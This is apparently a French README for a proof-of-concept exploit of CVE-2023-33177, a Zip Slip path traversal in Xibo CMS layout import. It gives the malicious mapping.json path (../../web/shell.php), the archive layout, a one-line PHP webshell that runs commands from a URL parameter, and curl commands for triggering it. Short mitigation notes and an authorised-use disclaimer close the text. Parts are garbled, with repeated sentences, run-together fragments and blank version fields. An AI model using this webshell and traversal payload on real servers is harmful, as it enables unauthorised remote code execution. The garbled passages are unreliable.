
Cet exploit démontre une **vulnérabilité de traversée de chemin** dans Xibo CMS (CVE-2023-33177) qui permet une exécution de code à distance via des importations de mise en page malveillantes.
Cet exploit démontre une vulnérabilité de traversée de chemin dans Xibo CMS (CVE-2023-33177) permettant l'exécution de code à distance via l'importation malveillante de layouts.
CVE/Avis : CVE-2023-33177 Versions affectées :
Type de vulnérabilité : Traversée de chemin (Zip Slip) Impact : Exécution de code à distance (RCE)
Xibo CMS permet aux utilisateurs authentifiés d'importer des fichiers de layout via des archives ZIP. La fonction d'importation ne valide pas correctement les chemins de fichiers dans le fichier mapping.json, permettant à un attaquant d'écrire des fichiers en dehors du répertoire de bibliothèque prévu à l'aide de séquences de traversée de chemin (../../).
mapping.json : utilise ../../web/shell.php comme chemin de fichierlibrary/../../web/shell.php/var/www/cms/web/shell.phpZip contient : library/../../web/shell.php
Xibo lit : library/ + ../../web/shell.php (depuis mapping.json)
Xibo écrit : /var/www/cms/library/temp/ + ../../web/shell.php
Résultat : /var/www/cms/web/shell.php ← Webshell dans la racine web !
python3 create_exploit.py
Ceci crée exploit.zip contenant le paquet de layout malveillant.
xibo_admin / password)exploit.zipcurl 'http://localhost:8080/shell.php?cmd=id'
L'exploit ZIP contient :
exploit.zip
├── layout.json # Définition de layout Xibo valide
├── playlist.json # Playlist vide (déclenche l'import JSON)
├── mapping.json # Contient la charge utile de traversée de chemin
└── library/
└── ../../web/
└── shell.php # Webshell PHP (extrait vers la racine web)
La webshell intégrée est minimale :
<?php system($_GET["cmd"]); ?>
Accédez-y via : http://<cible>/shell.php?cmd=<commande>
Versions corrigées :
Stratégies d'atténuation :
.. ou les chemins absolusCet exploit est fourni pour :
N'utilisez pas cet exploit contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite de test.
complexusprada Novembre 2025